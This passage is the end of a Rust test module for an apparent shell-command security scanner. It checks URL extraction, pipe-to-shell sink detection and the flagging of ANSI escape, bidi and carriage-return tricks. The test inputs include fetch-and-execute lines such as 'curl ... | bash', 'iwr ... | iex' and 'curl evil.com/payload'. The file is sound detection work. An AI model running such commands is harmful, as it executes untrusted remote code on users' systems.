            ScanContext::Exec
        ));
    }
    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(tier1_scan("open file.zip", ScanContext::Exec));
    }
    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
    }
    // The paste pattern set is a superset of exec and also reacts to
    // non-ASCII content.
    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(tier1_scan("café", ScanContext::Paste));
    }
    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
    }
    #[test]
    fn test_tier1_exec_no_non_ascii() {
        assert!(!tier1_scan("echo café", ScanContext::Exec));
    }

    // --- byte scanner ----------------------------------------------------

    #[test]
    fn test_byte_scan_ansi() {
        let input = b"hello \x1b[31mred\x1b[0m world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }
    #[test]
    fn test_byte_scan_control_chars() {
        let input = b"hello\rworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }
    #[test]
    fn test_byte_scan_bidi() {
        let input = "hello\u{202E}dlrow".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_bidi_controls);
    }
    #[test]
    fn test_byte_scan_zero_width() {
        let input = "hel\u{200B}lo".as_bytes();
        let result = scan_bytes(input);
        assert!(result.has_zero_width);
    }
    #[test]
    fn test_byte_scan_clean() {
        let input = b"hello world\n";
        let result = scan_bytes(input);
        assert!(!result.has_ansi_escapes);
        assert!(!result.has_control_chars);
        assert!(!result.has_bidi_controls);
        assert!(!result.has_zero_width);
    }

    // --- URL extraction --------------------------------------------------

    #[test]
    fn test_extract_urls_basic() {
        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
        assert_eq!(urls.len(), 1);
        assert_eq!(urls[0].raw, "https://example.com/install.sh");
    }
    #[test]
    fn test_extract_urls_from_leading_env_assignment() {
        let urls = extract_urls(
            "PAYLOAD_URL=https://example.com/install.sh curl ok",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
            "leading env assignment URL should be extracted in sink context"
        );
    }
    #[test]
    fn test_extract_urls_from_quoted_leading_env_assignment() {
        let urls = extract_urls(
            "PAYLOAD_URL='https://example.com/install.sh' curl ok",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "https://example.com/install.sh"),
            "quoted leading env assignment URL should be extracted"
        );
    }
    #[test]
    fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
        let urls = extract_urls(
            "HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
            ShellType::Posix,
        );
        assert!(
            !urls.iter().any(|u| u.raw == "http://proxy:8080"),
            "proxy configuration URLs should not be treated as destinations"
        );
    }
    #[test]
    fn test_extract_urls_pipe() {
        let urls = extract_urls(
            "curl https://example.com/install.sh | bash",
            ShellType::Posix,
        );
        assert!(!urls.is_empty());
        assert!(urls[0].in_sink_context);
    }
    #[test]
    fn test_extract_urls_scp() {
        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
        assert!(!urls.is_empty());
        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
    }
    #[test]
    fn test_extract_docker_ref() {
        let urls = extract_urls("docker pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }
    #[test]
    fn test_extract_powershell_iwr() {
        let urls = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!urls.is_empty());
    }

    // --- wrapper command resolution (env / command / time / tirith) ------

    #[test]
    fn test_wrapper_preserves_sink_context() {
        let urls = extract_urls(
            "env --ignore-environment curl http://example.com",
            ShellType::Posix,
        );
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "wrapped sink commands should keep sink context"
        );
    }
    #[test]
    fn test_env_wrapper_preserves_tirith_run_sink_context() {
        let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "env wrapper should preserve tirith run sink context"
        );
    }
    #[test]
    fn test_command_wrapper_preserves_tirith_run_sink_context() {
        let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "command wrapper should preserve tirith run sink context"
        );
    }
    #[test]
    fn test_time_wrapper_preserves_tirith_run_sink_context() {
        let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
        assert!(
            urls.iter()
                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
            "time wrapper should preserve tirith run sink context"
        );
    }

    // --- strip_quotes edge cases ------------------------------------------

    #[test]
    fn test_strip_quotes_single_char() {
        assert_eq!(strip_quotes("\""), "\"");
        assert_eq!(strip_quotes("'"), "'");
    }
    #[test]
    fn test_strip_quotes_empty() {
        assert_eq!(strip_quotes(""), "");
    }

    // --- byte scanner: control characters and escape introducers ----------

    #[test]
    fn test_scan_bytes_bel_vt_del() {
        let input = b"hello\x07world";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
        let input = b"hello\x0Bworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
        let input = b"hello\x0Cworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
        let input = b"hello\x7Fworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }
    #[test]
    fn test_scan_bytes_osc_apc_dcs() {
        let input = b"hello\x1b]0;title\x07world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
        let input = b"hello\x1b_dataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
        let input = b"hello\x1bPdataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    // --- schemeless host heuristics ---------------------------------------

    #[test]
    fn test_schemeless_long_tld() {
        assert!(looks_like_schemeless_host("example.academy"));
        assert!(looks_like_schemeless_host("example.photography"));
    }
    #[test]
    fn test_segment_index_correct() {
        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
        for url in &urls {
            assert!(url.segment_index <= 1);
        }
    }

    // --- docker image extraction -------------------------------------------

    #[test]
    fn test_docker_build_context_not_image() {
        let urls = extract_urls("docker build .", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(
            docker_urls.len(),
            0,
            "build context '.' should not be treated as image"
        );
    }
    #[test]
    fn test_docker_image_subcmd() {
        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }
    #[test]
    fn test_docker_run_image_after_double_dash() {
        let urls = extract_urls(
            "docker run --rm -- evil.registry/ns/img:1",
            ShellType::Posix,
        );
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
        assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
    }

    // --- generated tier-1 module invariants ---------------------------------

    #[test]
    fn test_tier1_module_boundary_enforcement() {
        let ids = tier1_generated::EXTRACTOR_IDS;
        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_count > 0, "Must have exec fragments");
        assert!(
            paste_count >= exec_count,
            "Paste fragments must be superset of exec fragments"
        );
        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }

    // --- carriage-return handling: CRLF is benign, lone mid-text CR is not --

    #[test]
    fn test_scan_bytes_trailing_cr_not_flagged() {
        let result = scan_bytes(b"/path\r");
        assert!(
            !result.has_control_chars,
            "trailing \\r should not be flagged"
        );
    }
    #[test]
    fn test_scan_bytes_trailing_crlf_not_flagged() {
        let result = scan_bytes(b"/path\r\n");
        assert!(
            !result.has_control_chars,
            "trailing \\r\\n should not be flagged"
        );
    }
    #[test]
    fn test_scan_bytes_windows_multiline_not_flagged() {
        let result = scan_bytes(b"line1\r\nline2\r\n");
        assert!(
            !result.has_control_chars,
            "Windows \\r\\n line endings should not be flagged"
        );
    }
    #[test]
    fn test_scan_bytes_embedded_cr_still_flagged() {
        let result = scan_bytes(b"safe\rmalicious");
        assert!(
            result.has_control_chars,
            "embedded \\r before non-\\n should be flagged"
        );
    }
    #[test]
    fn test_scan_bytes_mixed_crlf_and_attack_cr() {
        let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
        assert!(
            result.has_control_chars,
            "attack \\r mixed with \\r\\n should be flagged"
        );
    }
    #[test]
    fn test_scan_bytes_only_cr() {
        let result = scan_bytes(b"\r");
        assert!(
            !result.has_control_chars,
            "lone trailing \\r should not be flagged"
        );
    }

    // --- output-flag values must not become schemeless URLs ------------------

    #[test]
    fn test_schemeless_skip_curl_output_flag() {
        let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "lenna.png should not be detected as schemeless URL"
        );
    }
    #[test]
    fn test_schemeless_skip_curl_output_combined() {
        let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-olenna.png should not be detected as schemeless URL"
        );
    }
    #[test]
    fn test_schemeless_skip_wget_output_flag() {
        let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "output.html should not be detected as schemeless URL"
        );
    }
    #[test]
    fn test_schemeless_skip_wget_combined() {
        let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-Ooutput.html should not be detected as schemeless URL"
        );
    }
    #[test]
    fn test_schemeless_real_domain_still_detected() {
        let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.com/payload should be detected as schemeless URL"
        );
    }
    #[test]
    fn test_schemeless_user_at_host_detected_in_sink_context() {
        let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert_eq!(schemeless.len(), 1);
        assert_eq!(schemeless[0].raw, "user@bit.ly");
    }
    #[test]
    fn test_scp_user_at_host_not_treated_as_schemeless_url() {
        let urls = extract_urls("scp user@server.com file.txt", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(schemeless.is_empty());
    }

    // --- TLD/file-extension overlap (.zip, .sh, ...) --------------------------

    #[test]
    fn test_schemeless_png_no_slash_is_file() {
        assert!(!looks_like_schemeless_host("lenna.png"));
    }
    #[test]
    fn test_schemeless_tld_overlap_with_path_is_domain() {
        assert!(looks_like_schemeless_host("evil.zip/payload"));
        assert!(looks_like_schemeless_host("evil.sh/payload"));
    }
    #[test]
    fn test_schemeless_tld_overlap_without_path_is_file() {
        assert!(!looks_like_schemeless_host("lenna.zip"));
        assert!(!looks_like_schemeless_host("script.sh"));
    }
    #[test]
    fn test_schemeless_tld_overlap_sink_context_detected() {
        let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.zip/payload should be detected as schemeless URL in sink context"
        );
    }
}